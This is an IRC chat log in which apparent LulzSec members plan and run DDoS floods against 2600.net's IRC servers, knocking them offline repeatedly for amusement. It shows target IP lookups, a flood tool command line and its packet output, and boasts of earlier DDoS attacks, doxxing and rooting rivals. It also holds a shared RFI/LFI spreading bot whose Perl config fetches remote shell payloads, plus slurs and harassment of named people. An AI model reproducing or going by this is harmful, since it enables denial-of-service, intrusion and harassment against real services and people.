04:07:25[redacted]been poking at itJun 01 04:08:04stormniceJun 01 04:08:10stormAIM for a sec?Jun 01 04:08:14[redacted]sureJun 01 04:27:31[redacted]night guizJun 01 04:28:32stormnightJun 01 04:28:37joepie92nightJun 01 04:29:29lolnini :)Jun 01 04:30:04joepie92LOLJun 01 04:30:05joepie92http://www.youtube.com/watch?v=ZmUlKPthragJun 01 04:30:09joepie92look at the top commentsJun 01 04:30:23stormim hitting efnet spoofsJun 01 04:30:23storm;xJun 01 04:30:34stormthats how bored i bezJun 01 04:54:33Topiarywanna find something to hit?Jun 01 05:05:45stormsureJun 01 05:06:01Topiarythere's shit cool siteJun 01 05:06:03Topiaryfbi.govJun 01 05:06:10lolxDJun 01 05:06:14stormlolJun 01 05:06:24lolddos ic3.gov :DJun 01 05:06:40stormwhats with everyone wanting to hit govsJun 01 05:06:55stormare you really that open to just going to jail ;xJun 01 05:07:08stormnot you you, te royal youJun 01 05:07:10stormthe evenJun 01 05:08:21TopiaryI suppose we could piss off some IRC for lulzJun 01 05:10:19stormsureJun 01 05:10:32joepie92does any of youJun 01 05:10:34joepie92know a user calledJun 01 05:10:35joepie92schmooJun 01 05:10:41lolnopeJun 01 05:10:42lol:/Jun 01 05:10:44lolwhy?Jun 01 05:10:46TopiarynegativeJun 01 05:10:49joepie92I think it might be the nonynews guyJun 01 05:10:52joepie92posting shit on wikiaJun 01 05:10:59joepie92but unsureJun 01 05:11:02joepie92I've never seen him talkJun 01 05:11:05joepie92he's in a lot of channelsJun 01 05:11:05Topiaryjoepie92: nonynews posted on twitter that I was probably tweeting for LulzSecJun 01 05:11:09Topiaryso yesJun 01 05:11:10Topiarymight beJun 01 05:11:13joepie92only thignJun 01 05:11:19joepie92schmoo has op in propagandaJun 01 05:11:23joepie92so I'm not sure how he got thatJun 01 05:11:33joepie92so I'd have to ask the channel founder thereJun 01 05:11:34lolnonynews is prbs a jesterfag thinking they're being covertJun 01 05:11:36lolxDJun 01 05:11:40joepie92nonynews also mentioned somethingJun 01 05:11:42lolbest thing to do when boredJun 01 05:11:43joepie92that happened in #codersJun 01 05:11:50joepie92and there's only a few people thereJun 01 05:11:51lolgo to 2600 irc and just cause dramaJun 01 05:11:51lol:DJun 01 05:12:03Topiaryshould we just go on over to 2600, flame them, and then packet it?Jun 01 05:12:07joepie92@nonyNewsJun 01 05:12:07joepie92nony NewsJun 01 05:12:07joepie92Peacemaking proposes an IP-spoofing version of #LOIC for use by #Anonymous. Ingenious!Jun 01 05:12:09joepie92that was in #codersJun 01 05:12:50joepie92schmoo is/was in all channels that nonynews mentions shit from it seemsJun 01 05:13:08joepie92@nonyNewsJun 01 05:13:08Topiarydo we still have spies in #jester?Jun 01 05:13:08joepie92nony NewsJun 01 05:13:08joepie92&lt;lucid&gt; I think anonymous should host a free proxy server, that would be awesome -- Will die laughing when @FBIPressOffice sets this one up.Jun 01 05:13:18joepie92(that was in #senloris, where schmoo is as well)Jun 01 05:13:19joepie92and idkJun 01 05:13:35Topiarywe need to gather info and profile all these fags, backtrace crew/wiki crew/jester crewJun 01 05:13:38Topiarysee where it all overlapsJun 01 05:13:44joepie92Topiary, pmJun 01 05:13:47TopiarykJun 01 05:13:51stormDONT DO ITJun 01 05:13:54stormITS A TRAPJun 01 05:13:59storm;pJun 01 05:14:36Topiaryit's okay he just wants to see my cockJun 01 05:14:49stormsurpriseJun 01 05:14:51lolis the whois a complete fake too?Jun 01 05:14:56loleven the one at private whois?Jun 01 05:14:56stormdidnt know you had a cockJun 01 05:16:16storm05:16 -!- storm [~stormeh@97-120-249-224.ptld.qwest.net]Jun 01 05:16:17storm05:16 -!-  ircname  : stormehJun 01 05:16:17storm05:16 -!-  channels : #telephreak #infoleakJun 01 05:16:17storm05:16 -!-  server   : collective.2600.net [Arghhh, Scourge of the seven seas!]Jun 01 05:16:17storm05:16 -!-  hostname : 97.120.249.224Jun 01 05:16:21stormWTF NIGGERJun 01 05:16:35stormget the fk off my nameJun 01 05:16:37storm:(Jun 01 05:17:27lolif it's not reg'd dos him off of it xDJun 01 05:17:54stormim gonna hit 3 ips actuallyJun 01 05:17:54storm;pJun 01 05:18:00storm05:17 djslocker.2600.net has address 173.165.207.25Jun 01 05:18:00storm05:17 -!- Irssi: process 0 (host djslocker.2600.net) terminated with returnJun 01 05:18:00stormcode 0Jun 01 05:18:00storm05:17 madjack.2600.net has address 216.86.158.122Jun 01 05:18:00storm05:17 madjack.2600.net has IPv6 address 2607:f128:40:f00:fe31::3Jun 01 05:18:00storm05:17 -!- Irssi: process 0 (host madjack.2600.net) terminated with return code 0Jun 01 05:18:00storm05:17 collective.2600.net has address 208.111.35.75Jun 01 05:18:05lol:DJun 01 05:18:16lolor, lets go take over some chan on efet :DJun 01 05:18:22loldos them all off :DJun 01 05:18:25stormlolJun 01 05:18:29stormeither orJun 01 05:18:30storm;DJun 01 05:18:33lol;DJun 01 05:18:39*	Topiary hops in iPredator VPN for the lulz and connects to 2600Jun 01 05:18:46stormi have too many channels on efnetJun 01 05:18:52lollet us do #phrack #cdej and #hackersJun 01 05:18:59storm| anonymous (unknown@dmvdetailing.com) (Commercial)Jun 01 05:18:59storm: ircname  : unbound by space or time.Jun 01 05:18:59storm| channels : @#junkie @#malicious @#phear @#e @#syn @#jupiter @#addict @#jupedJun 01 05:18:59storm@#geek @#overdose @#evil @#mayhemJun 01 05:19:17storm;pJun 01 05:19:52lolor we can go to overthewire and give andrewg some shit :DJun 01 05:21:03Topiarysec, lemme get on something that isn't JapaneseJun 01 05:21:10*	Topiary has quit (Quit: true-story.pdf)Jun 01 05:21:20joepie92lolJun 01 05:22:02lolWhats wrong with Japan :(?Jun 01 05:23:42stormgodzilla lives tereJun 01 05:23:44stormthereJun 01 05:24:50joepie92I put a godzilla in your vpn so you can raep while you raepJun 01 05:24:57stormlolJun 01 05:25:00joepie92amidoinitright?Jun 01 05:25:04stormnoJun 01 05:25:23joepie92:(Jun 01 05:25:52*	t[2] (t@HA-vft.h6t.9puaba.IP) has joined #pure-eliteJun 01 05:26:03stormthat took forevarJun 01 05:26:13stormdjslocker.2600.net down sons and daughtersJun 01 05:26:17joepie92lolJun 01 05:26:18*	t[2] is now known as TopiaryJun 01 05:26:20joepie92wb TopJun 01 05:26:29*	Topiary has quit (A TLS packet with unexpected length was received.)Jun 01 05:26:37stormlolJun 01 05:26:38stormoopsJun 01 05:26:38*	Topiary (t@HA-vft.h6t.9puaba.IP) has joined #pure-eliteJun 01 05:26:45joepie92lolJun 01 05:27:02TopiaryrightJun 01 05:27:07stormTopiaryJun 01 05:27:13stormget on 3600Jun 01 05:27:14stormerJun 01 05:27:15storm2600Jun 01 05:27:16Topiarydisregard two disconnects; forgot password, couldn't be bothered to type it rightJun 01 05:27:16stormlDJun 01 05:27:18storm;DJun 01 05:27:20Topiaryokay dudeJun 01 05:27:24TopiaryI'm in Switzerland right nao :DJun 01 05:27:30stormhotJun 01 05:27:31joepie92lololJun 01 05:27:44joepie92pm again btw :PJun 01 05:29:18storm05:29 -!-      |- djslocker.2600.net ----------------------- | Users:    26Jun 01 05:29:20stormroflolJun 01 05:29:26Topiaryokay I'm onJun 01 05:29:28Topiarywhere we at?Jun 01 05:29:31storm./mapJun 01 05:29:34stormlook at djsJun 01 05:29:53Topiaryheh 30 peopleJun 01 05:30:02Topiarysec reading shitJun 01 05:33:01stormmadjack.2600.net naoJun 01 05:33:02storm;DJun 01 05:33:32storm64 packets transmitted, 8 received, 87% packet loss, time 62994msJun 01 05:33:49lol:DJun 01 05:33:54stormits nulledJun 01 05:34:36lolhahahJun 01 05:34:47storm67 packets transmitted, 0 received, 100% packet loss, time 65992msJun 01 05:34:50stormlolJun 01 05:34:52storm:]Jun 01 05:35:16lolcan you hit this ip 69.164.198.161 :D it's some fag on 2600 in #lulzsec we're going to take over the channel :DJun 01 05:35:26lolhe is only person in there :DJun 01 05:36:23stormwhat server is he onJun 01 05:36:27stormhe'll just ping out anywayJun 01 05:37:41lolmadjack.2600.netJun 01 05:37:53*	Topiary is on collectiveJun 01 05:38:04Topiary* [ego] (~ego@46.19.143.19): egoJun 01 05:38:06Topiarydon't DDoS me pl0xJun 01 05:38:11stormmadjacks deadJun 01 05:38:15stormso just wait for him to dieJun 01 05:39:32stormer wait na madjacks back xDJun 01 05:39:41TopiaryI just got disconnected from collectiveJun 01 05:39:42stormits null lasts like 5 - 6 minutesJun 01 05:39:45stormorlyJun 01 05:40:47Topiaryreconnected to djsJun 01 05:40:54stormyeah sameJun 01 05:40:54Topiaryexpecting a ping on collectiveJun 01 05:41:16stormcan you get a map?Jun 01 05:42:02stormlooks like we pissed these guys off so bad that they upped some of their boxes filteringJun 01 05:42:11stormlulululJun 01 05:42:26lol:DJun 01 05:42:36stormOHJun 01 05:42:38stormmads goneJun 01 05:42:43stormdid that guy ping?Jun 01 05:43:04TopiaryyeahJun 01 05:43:08stormggJun 01 05:43:18loli can't even connect to 2600 xDJun 01 05:43:22stormlmfaoJun 01 05:43:30storm05:43 -!- egotistical [~ego@46.19.143.19] has joined #lulzsecJun 01 05:43:30storm05:43 &lt; egotistical&gt; bitchesJun 01 05:43:32stormROFLJun 01 05:43:36stormthat you?Jun 01 05:43:42stormor the guy who was in there befioreJun 01 05:43:44stormbefore evenJun 01 05:43:49Topiaryit's meJun 01 05:43:51lolthts TopiaryJun 01 05:43:55stormoh i cJun 01 05:43:56Topiaryfor some reason my collective shit hasn't pingedJun 01 05:43:57stormxDJun 01 05:44:05stormit will if i let off of itJun 01 05:44:14stormi thinkJun 01 05:44:14lolTopiary what server are you connected to?Jun 01 05:44:14stormthat or their ping timeouts super highJun 01 05:44:14TopiarydjsJun 01 05:44:19stormdjslockJun 01 05:44:20Topiaryshould be 240 secsJun 01 05:44:21lol.net?Jun 01 05:44:24stormyaJun 01 05:44:37Topiary* djslocker.2600.net ------------------------------- | Users:   111 (63.4%)Jun 01 05:44:37Topiary*  '- blackbeard.2600.net -------------------------- | Users:     0 (0.0%)Jun 01 05:44:37Topiary*      |- collective.2600.net ---------------------- | Users:    55 (31.4%)Jun 01 05:44:37Topiary*      '- services.2600.net ------------------------ | Users:     9 (5.1%Jun 01 05:44:44Topiarythese guys are so fun to fuckJun 01 05:45:01stormdont worry djs is nextJun 01 05:45:02storm&gt;:LDJun 01 05:45:04storm&gt;:DJun 01 05:45:27lolwait :D let us troll the shit out of them first :DJun 01 05:45:50lolthen we can PUSH/SYN/ACK/UDP them to oblivion hahahahahahahaJun 01 05:45:57stormewwwwwwwwwJun 01 05:46:00stormYOU SAID UDPJun 01 05:46:02storm!!!!Jun 01 05:46:04lol:oJun 01 05:46:06stormi am using urgJun 01 05:46:09stormatmJun 01 05:46:17lolUDP is ok, if you hit ports at randJun 01 05:46:22stormwellJun 01 05:46:30stormi had access to these great britian boxesJun 01 05:46:32stormthose + udpJun 01 05:46:34stormwere sexyJun 01 05:47:03loli used to load about 8,000 RFI with usp flooder crushed most server :DJun 01 05:47:09loludp*Jun 01 05:47:16lolit used to hit ports at randomJun 01 05:47:17lol:DJun 01 05:47:35TopiaryI imagine it wouldJun 01 05:48:09loli ddos'd enturbulation.org, whyweprotest, anonnet for about 3 week with it all :DDDDDJun 01 05:48:18stormhahaJun 01 05:48:22Topiaryahaha that was you?Jun 01 05:48:24stormi only use TCPJun 01 05:48:26lolyes :DJun 01 05:48:31TopiaryGregg Housh was bitching about thatJun 01 05:48:42lolalot of people we're bitching about itJun 01 05:48:48lollet me show youJun 01 05:49:01loli dont care if this USB infects me because it's funny to show you this :DJun 01 05:49:39stormFlood completed, 41784641 packets sent, 75 seconds, 557128 packets/secJun 01 05:49:42stormnulled madjackJun 01 05:49:45stormagainJun 01 05:50:47lolit's actually not infected :DJun 01 05:51:13stormyayJun 01 05:51:15*	joepie92 remembers an UDP flood on this home IPJun 01 05:51:23storm[05:51] [storm__(+i)] [2:djslocker/#lulzsec(+nt)] [Lag: 51 (??)]Jun 01 05:51:23Topiarypretty sure I just pinged from djsJun 01 05:51:25lolstorm would you also like the RFI/LFI bot with google bypass i was talking about while i have this plugged in?Jun 01 05:51:29stormroflJun 01 05:51:31stormTopiaryJun 01 05:51:32storm&lt;3Jun 01 05:51:39stormyesJun 01 05:51:43stormi would kaylaJun 01 05:51:44storm:)Jun 01 05:51:44joepie92a while ago I had ~20 shared hosting servers UDP flooding my modem...Jun 01 05:51:53joepie92not sure how it didn't meltJun 01 05:52:07stormSending packets of size 40....x 208.111.35.75 218.108.235.225 6667 0 20 0Jun 01 05:52:13storm[root@node1(~/opt/.local)]#./nsdapx 173.165.207.25 0 6667 0 20 0Jun 01 05:52:16stormboth at same timeJun 01 05:52:17stormlolJun 01 05:52:20loli dont know if the bypass will still work it is a old bot :DJun 01 05:52:21Topiarywelp, they're fuckedJun 01 05:52:25lolbut we will see :DJun 01 05:52:26stormand madjacks nulledJun 01 05:52:26stormdudeJun 01 05:52:34stormtheyre not gonna have anywhere to chatrJun 01 05:52:36stormchat*Jun 01 05:52:37Topiaryby the way, they think we're firing botnets that can only keep it down for 10 mins at a timeJun 01 05:52:46stormlolJun 01 05:52:50stormtheyre retardedJun 01 05:52:51stormxDJun 01 05:53:08Topiaryokay so everything is down? madjack nulled, collective out, djs out, what about blackbeard?Jun 01 05:53:14storm05:52 -!- bottle_of_rum [~bottle_of@189-39-145-108.gru.flash.tv.br] has quitJun 01 05:53:14storm[Ping timeout: 240 seconds]Jun 01 05:53:16stormLOLJun 01 05:53:29storm[Lag: 176 (??)]Jun 01 05:53:38Topiarymine's about to go if it hasn't alreadyJun 01 05:53:51storm05:53 -!- ego [~ego@46.19.143.19] has quit [Ping timeout: 240 seconds]Jun 01 05:53:52stormdidJun 01 05:54:04storm[Lag: 211 (??)]Jun 01 05:54:06Topiary* Connecting to irc.2600.net (94.125.252.114) port 6667...Jun 01 05:54:06Topiary* Connecting to irc.2600.net (173.165.207.25) port 6667...Jun 01 05:54:08TopiaryfailedJun 01 05:54:11storm:DJun 01 05:54:21Topiaryoh shit I'm in on 173Jun 01 05:54:22storm05:54 -!- ERROR Closing Link: c-68-56-76-36.hsd1.fl.comcast.net (Ping timeout:Jun 01 05:54:22storm240 seconds)Jun 01 05:54:22storm05:54 -!- Irssi: Connection lost to djslocker.2600.netJun 01 05:54:22storm05:54 -!- Irssi: Removed reconnection to server djslocker.2600.net port 6667Jun 01 05:54:22storm05:54 -!- Irssi: Looking up djslocker.2600.netJun 01 05:54:22storm05:54 -!- Irssi: Reconnecting to djslocker.2600.net [173.165.207.25] port 6667Jun 01 05:54:22storm- use /RMRECONNS to abortJun 01 05:54:24TopiaryslooooowlyJun 01 05:54:41stormi let offJun 01 05:54:44stormwanna check usersJun 01 05:54:45storm;xJun 01 05:54:47Topiary* collective.2600.net ------------------------------ | Users:   114 (30.2%)Jun 01 05:54:47Topiary*  '- blackbeard.2600.net -------------------------- | Users:     0 (0.0%)Jun 01 05:54:48Topiary*      |- madjack.2600.net ------------------------- | Users:   132 (35.0%)Jun 01 05:54:48Topiary*      |- djslocker.2600.net ----------------------- | Users:   122 (32.4%)Jun 01 05:54:48Topiary*      '- services.2600.net ------------------------ | Users:     9 (2.4%Jun 01 05:55:06storm05:54 -!- djslocker.2600.net ------------------------------- | Users:    95Jun 01 05:55:06storm(29.3%)Jun 01 05:55:06storm05:54 -!-  '- blackbeard.2600.net -------------------------- | Users:     0Jun 01 05:55:06storm(0.0%)Jun 01 05:55:06storm05:54 -!-      |- madjack.2600.net ------------------------- | Users:   132Jun 01 05:55:06storm(40.7%)Jun 01 05:55:06storm05:54 -!-      |- collective.2600.net ---------------------- | Users:    88Jun 01 05:55:06storm(27.2%)Jun 01 05:55:06storm05:54 -!-      '- services.2600.net ------------------------ | Users:     9Jun 01 05:55:09stormyou're offJun 01 05:55:11stormi thinkJun 01 05:55:47Topiarystill going strongJun 01 05:55:49stormmadjacks doneJun 01 05:56:36Topiary* bottle_of_rum has quit (Ping timeout: 240 seconds)Jun 01 05:56:36Topiary* ego has quit (Ping timeout: 240 seconds)Jun 01 05:56:37Topiary* storm__ has quit (Ping timeout: 240 secondsJun 01 05:56:37TopiaryLOLJun 01 05:56:43stormlololJun 01 05:57:48lolTopiary: So yeh, the thing with anonnet, entub, whywe protest all started because my friend C ddos'd anonnet and i got the blame for it, genome was ranting at me for ages saying my ddos was pathetic when it wasn't even me who ddos'd himJun 01 05:57:59lolso i thought "fuck it, ill show you ddos"Jun 01 05:58:11lolkept enturb, wwp, anonnet down for 3 weeksJun 01 05:58:14Topiarygood ideaJun 01 05:58:23lolthen genome was demanding my doxJun 01 05:58:26lolso i dox'd himJun 01 05:58:29lolsee thisJun 01 05:58:52lolhttp://www.aminsb.org/administrator/sec/lols/genome.txtJun 01 05:59:05lolhe raged like fuck for agesJun 01 05:59:11lolthreatening all kindsJun 01 05:59:14lolso i did thisJun 01 05:59:30lolhttp://www.aminsb.org/administrator/sec/lols/anonnet.txtJun 01 05:59:35lolrooted tht shit :DJun 01 05:59:48lolafter tht he p much gave up :DJun 01 06:00:04Topiary* collective.2600.net ------------------------------ | Users:   152 (55.1%)Jun 01 06:00:06Topiary*  '- blackbeard.2600.net -------------------------- | Users:     0 (0.0%)Jun 01 06:00:08Topiary*      |- djslocker.2600.net ----------------------- | Users:   115 (41.7%)Jun 01 06:00:10Topiary*      '- services.2600.net ------------------------ | Users:     9 (3.3%)Jun 01 06:00:11stormlolJun 01 06:00:12Topiaryruh roh, madjack's goneJun 01 06:00:14stormXDJun 01 06:01:53Topiarylet's just let 'em up and troll under different types of weatherJun 01 06:01:56Topiaryyou be storm, I be whirlpoolJun 01 06:01:59Topiarykayla be tornadoJun 01 06:02:18stormxDJun 01 06:02:25joepie92... a whirlpool isn't weather?Jun 01 06:02:31stormLMFAOJun 01 06:02:46TopiaryYES IT IS JOEPIEJun 01 06:02:54joepie92lolnoJun 01 06:02:54TopiaryGOSH JOEPIEJun 01 06:03:10joepie92lolno it r notJun 01 06:03:30Topiaryokay, let's troll under names of natural disastersJun 01 06:03:32Topiaryyou be stormJun 01 06:03:35TopiaryI be whirlpoolJun 01 06:03:38Topiaryjoepie be joepieJun 01 06:03:38stormlmaoJun 01 06:03:40Topiary&gt;:[Jun 01 06:03:42joepie92LOLJun 01 06:03:50joepie92also a whirlpool is not a natural disasterJun 01 06:03:56Topiarylisten broJun 01 06:04:01TopiaryI've seen PotC 3Jun 01 06:04:06joepie92"natural occurences" would probably be more accurateJun 01 06:04:06joepie92:)Jun 01 06:04:07Topiaryand that thing fucks shit upJun 01 06:04:12joepie92occurrences*?Jun 01 06:04:15joepie92herpderpenglishJun 01 06:04:19lolstorm: http://www.aminsb.org/administrator/sec/lols/d0ngs.rarJun 01 06:04:22loltht bot :DJun 01 06:04:29joepie92A whirlpool is a swirling body of water usually produced by ocean tides. The vast majority of whirlpools are not very powerful. More powerful ones are more properly termed maelstroms. Vortex is the proper term for any whirlpool that has a downdraft. Very small whirlpools can easily be seen when a bath or a sink is draining, but these are produced in a very different manner from those in nature. Smaller whirlpoolsJun 01 06:04:30joepie92also appear at the base of many waterfalls.[1] In the case of powerful waterfalls, like Niagara Falls, these whirlpools can be quite strong. The most powerful whirlpools are created in narrow shallow straits with fast flowing water.Jun 01 06:04:32stormtytyJun 01 06:04:54lolyou need to set all the files up on a serverJun 01 06:05:04stormlol im already wgetting it somewhereJun 01 06:05:09Topiary&gt;whirlpool is now known as maelstromJun 01 06:05:20joepie92lolJun 01 06:05:26Topiary&gt;enemy ship is now known as driftwoodJun 01 06:05:30lolliek the shell, phpbot if you want it to spread and the perl bot to spread and the id's aswell as the google.php thts the google bypas but i dont know if the google bypass still worksJun 01 06:05:31joepie92ahahahaJun 01 06:06:06lol##[ KONFIGURASI URL ]##Jun 01 06:06:06lolmy $fx29id  = "http://reichenthal.at/pages/s/idxx.txt????"; #Fx29ID (Simple) / (Advanced)Jun 01 06:06:06lolmy $fx29id2 = "http://reichenthal.at/pages/s/id2.txt????"; #Fx29ID (Advanced)Jun 01 06:06:07lolmy $fx29sh  = "http://reichenthal.at/pages/s/sh.txt????"; #Fx29Sh (Optional)Jun 01 06:06:07lolmy $bypass  = "http://reichenthal.at/pages/s/google.php"; #Google Bypasserz (Optional)Jun 01 06:06:26joepie92&gt;enemy is now known as drowning manJun 01 06:06:39storm06:03 -!- Irssi: Connection to collective.2600.net establishedJun 01 06:06:39storm06:03 !collective.2600.net *** Looking up your hostname...Jun 01 06:06:39storm06:03 !collective.2600.net *** Checking IdentJun 01 06:06:39storm06:03 !collective.2600.net *** No Ident responseJun 01 06:06:39storm06:04 !collective.2600.net *** Found your hostnameJun 01 06:06:39storm06:04 -!- ERROR Closing Link: c-68-56-76-36.hsd1.fl.comcast.net (RegistrationJun 01 06:06:39stormtimed out)Jun 01 06:06:53storm06:06 -!- Irssi: Looking up djslocker.2600.netJun 01 06:06:53storm06:06 -!- Irssi: Connecting to djslocker.2600.net [173.165.207.25] port 6667Jun 01 06:07:14stormmadjacks backJun 01 06:07:19lolstorm: you got the file so i can delete it?Jun 01 06:07:25stormsecJun 01 06:07:28stormyaJun 01 06:07:29stormgot itJun 01 06:07:32lol:)Jun 01 06:07:50lolthere's alot to config in it :OJun 01 06:08:05lolbut hopefully the google bypass "google.php" will still work :DJun 01 06:08:09stormi wouldnt know, it looks like a rar file :PJun 01 06:08:14stormit is a rar file!Jun 01 06:08:19stormFARKIN HELLJun 01 06:08:20stormlolJun 01 06:08:23lol*windows*Jun 01 06:08:24lolxDJun 01 06:08:27stormwhat kind of linux hacked box has rarJun 01 06:08:27storm!!!Jun 01 06:09:13lolxDJun 01 06:09:34storm06:09 -!-      |- djslocker.2600.net ----------------------- | Users:    21Jun 01 06:10:48Topiarycollective.2600.net ------------------------------ | Users:    80 (38.8%Jun 01 06:11:10stormlmaoJun 01 06:11:11stormdudeJun 01 06:11:16stormi took down everything thenJun 01 06:11:20stormcause madjacks nulledJun 01 06:11:35Topiaryjust got kicked off collectiveJun 01 06:11:45stormlolzJun 01 06:11:50Topiarywe should just do this every day until they refuse to house JesterJun 01 06:11:51stormshould i let it back up?Jun 01 06:12:05Topiarywhatever you wantJun 01 06:12:13stormkJun 01 06:13:49Topiaryor maybe we should just pwn 2600.net itselfJun 01 06:16:21stormwell that was fun XDJun 01 06:17:48TopiaryI love their little clique circlejerksJun 01 06:17:55Topiarythey all have a little retweet party with themselvesJun 01 06:18:11stormthey tweeting?Jun 01 06:19:00Topiaryyeah check out the feeds of @mach2600 @fakegregghoush @awinee and all retweetsJun 01 06:19:15Topiarythese are the same guys who specifically went after Sabu + our crew back in Feb with HBGaryJun 01 06:19:24Topiarythey're a lovable bunch of scoundrelsJun 01 06:21:10Topiaryerr, madjack just disappeared :xJun 01 06:22:00stormlolJun 01 06:25:04joepie92disappeared as in...?Jun 01 06:25:33Topiaryit's backJun 01 06:25:48stormits cause it gets nulledJun 01 06:25:49stormfor 5 minJun 01 06:26:23stormlolJun 01 06:26:35stormthats the funnest shit ive done with 2 servers ^_^Jun 01 06:26:45stormwho woulda thought 3 ircds could die to 2 boxesJun 01 06:27:13Topiarywell it's good taking out 2/3, watching them scramble to the 3rd, letting them come back, then fucking the 3rd while laying off the other 2Jun 01 06:27:19Topiarylike playing with rats and switchesJun 01 06:27:37stormhahaJun 01 06:27:41stormi could drop all 3 at onceJun 01 06:27:45stormif i wantedJun 01 06:27:50stormjust take 2 more box loginsJun 01 06:28:05stormbut theres no fun in that ;&lt;Jun 01 06:28:29Topiary* [Brainsturbator] (skully2012@71-23-43-101.war.clearwire-wmx.net): Agent SkullyJun 01 06:28:29Topiary* [Brainsturbator] #lulzsec #secnews #telephreak #2600Jun 01 06:28:30Topiarywho is this?Jun 01 06:28:48stormno ideaJun 01 06:28:58Topiarywe don't either, hmmJun 01 06:30:51stormAgent SkullyJun 01 06:30:55stormbetter watch outJun 01 06:31:00stormhes an 4g3n+Jun 01 06:31:46joepie92lololJun 01 06:31:47joepie92Since the hack, LulzSec has turned it attention towards patriot hacker Jester, the most prominent member of the anti-Wikileaks cyber-militia, who attacked WikiLeaks after the release of US diplomatic cables. Unsurprisingly, LulzSec claimed his hacks were "lame" before threatening an attack against long-running hacker magazine 2600. Â®Jun 01 06:31:50joepie92jester gonna be madJun 01 06:31:54joepie92I R NO PART OF MILITIAJun 01 06:31:56joepie92I R LONE WOLFJun 01 06:32:09Topiary&gt;claimed his hacksJun 01 06:32:11Topiary&gt;his hacksJun 01 06:32:15Topiarywe actually claimed he did no hacksJun 01 06:32:16Topiarywhich he didn'tJun 01 06:32:24Topiaryplease name one time Jester has hacked anything, I dare yaJun 01 06:32:33stormlolJun 01 06:32:52joepie92I suppose you could call modding LOIC to collect IPs, hacking.Jun 01 06:33:02joepie92[/devilsadvocate[Jun 01 06:33:03joepie92]*Jun 01 06:42:18lollol xDJun 01 06:42:26loli read on some sec siteJun 01 06:42:31lolwho has a j35t3r pageJun 01 06:42:44lolwrote how someone "cracked LOIC and altered it"Jun 01 06:42:58lollol i was like "errr.... the src is pub lol"Jun 01 06:44:03lolwhen all my brazillians get on im gonna dos them too :3Jun 01 06:44:32lolonly 34 in channel :o pointless yet, wait for the brazillians get get online should have about 70/80 :DJun 01 06:45:29TopiaryI snagged us some nice USAs the other dayJun 01 06:45:35Topiaryhopefully good netJun 01 06:45:49lolyeh :DJun 01 06:46:14lolthose [NEW] in there are US installs too i thinkJun 01 06:46:34stormrofl TopiaryJun 01 06:46:37stormyour servers downJun 01 06:46:52Topiarydamnit I was on collectiveJun 01 06:46:56Topiaryand so are you &gt;:[Jun 01 06:47:10stormnot uhJun 01 06:47:12stormim on djsJun 01 06:47:15stormi thinkJun 01 06:47:18Topiaryno sirJun 01 06:47:21Topiarywe're all on collectiveJun 01 06:47:36Topiaryohhhh shitJun 01 06:47:41Topiaryyou guys are, I'm on collectiveJun 01 06:47:43TopiaryffffffffJun 01 06:48:05stormlolllllllllJun 01 06:48:10stormlets switch servers thenJun 01 06:49:30joepie92cam someone explain to me why windows software running through WINE on puppy linux in a virtualbox instance runs faster than natively on the host windows systemJun 01 06:49:36joepie92:|Jun 01 06:49:38joepie92can*Jun 01 06:52:40stormTopiary can you map?Jun 01 06:52:46stormon collectiveJun 01 06:52:56Topiary* collective.2600.net ------------------------------ | Users:   204 (49.4%)Jun 01 06:52:56Topiary*  '- blackbeard.2600.net -------------------------- | Users:     0 (0.0%)Jun 01 06:52:56Topiary*      |- madjack.2600.net ------------------------- | Users:    99 (24.0%)Jun 01 06:52:56Topiary*      |- djslocker.2600.net ----------------------- | Users:   101 (24.5%)Jun 01 06:52:56Topiary*      '- services.2600.net ------------------------ | Users:     9 (2.2%Jun 01 06:53:01stormso it workedJun 01 06:53:03stormbah!Jun 01 06:53:04stormlolJun 01 06:53:11stormthey definitely changed the server aroundJun 01 06:54:21lolwhat channel are you guys in over there :D?Jun 01 06:54:30TopiarylulzsecJun 01 06:54:33Topiaryand 2600Jun 01 06:56:39stormcant believe they stepped up their gameJun 01 06:56:41stormlmaoJun 01 06:57:02lolop me am parr0t xDJun 01 07:03:13storm07:01 -!- bottle_of_rum [~bottle_of@72.46.129.46] has quit [Ping timeout: 240Jun 01 07:03:13stormseconds]Jun 01 07:03:13storm07:01 -!- echo [~echo@pool-108-27-212-254.nycmny.fios.verizon.net] has quitJun 01 07:03:13storm[Ping timeout: 240 seconds]Jun 01 07:03:13storm07:01 -!- RootBSD_ [~rootbsd@r00ted.com] has quit [Ping timeout: 240 seconds]Jun 01 07:03:13storm07:02 -!- bottle_of_rum [~bottle_of@72.46.129.46] has joined #2600Jun 01 07:03:13storm07:02 &lt; storm&gt; uh ohJun 01 07:03:13storm07:02 -!- isaac [~isaac@24.167.38.73] has quit [Ping timeout: 240 seconds]Jun 01 07:03:13storm07:02 -!- m0no [natas@c-75-67-212-35.hsd1.ma.komcast.net] has quit [Quit:Jun 01 07:03:13stormchanging servers]Jun 01 07:03:14storm07:02 -!- ZadYree [~ZadY@ip-87.net-89-2-31.rev.numericable.fr] has quit [PingJun 01 07:03:15stormtimeout: 240 seconds]Jun 01 07:03:16storm07:02 -!- warmonger [~hehe@108-65-79-77.lightspeed.sntcca.sbcglobal.net] hasJun 01 07:03:16stormquit [Ping timeout: 240 seconds]Jun 01 07:03:18storm07:02 &lt; storm&gt; magickalJun 01 07:03:18storm07:02 -!- The_Blob [~blob@S010600c00cb01b8c.vs.shawcable.net] has quit [PingJun 01 07:03:19lollol @ Highest connection count: 802 (801 clients) (95744 connections received)Jun 01 07:03:20stormtimeout: 240 seconds]Jun 01 07:03:21storm07:03 &lt; storm&gt; magickal indeedJun 01 07:03:22storm07:03 -!- WebDawg [~whoami@officialg0d.com] has quit [Ping timeout: 240 seconds]Jun 01 07:03:22stormlmfaoJun 01 07:03:24sabuits that sxJun 01 07:03:26sabusexJun 01 07:03:44lolsbau you're the sex ;DJun 01 07:03:57Topiarywell lawdyJun 01 07:04:16lolabusing 2600 is rather amusingJun 01 07:04:35stormlolzJun 01 07:04:50stormFlood completed, 254326485 packets sent, 447 seconds, 568963 packets/secJun 01 07:04:51sabulolJun 01 07:04:58sabuI  wake up to storm packetingJun 01 07:05:02stormlolJun 01 07:05:03sabuand kayla excitedJun 01 07:05:04sabu&lt;3Jun 01 07:05:06stormxDJun 01 07:05:11sabuwhat you niggas been doing without meJun 01 07:05:20stormowning 2600.netJun 01 07:05:21stormabout itJun 01 07:05:39sabujEaJun 01 07:06:05joepie92lolJun 01 07:06:15joepie92morning SabuJun 01 07:11:12stormindeedJun 01 07:11:15stormmorningJun 01 07:11:45sabumorning joepieJun 01 07:11:50sabuhows everyone doing?Jun 01 07:11:51*	Sabu gives channel operator status to [redacted] value Topiary 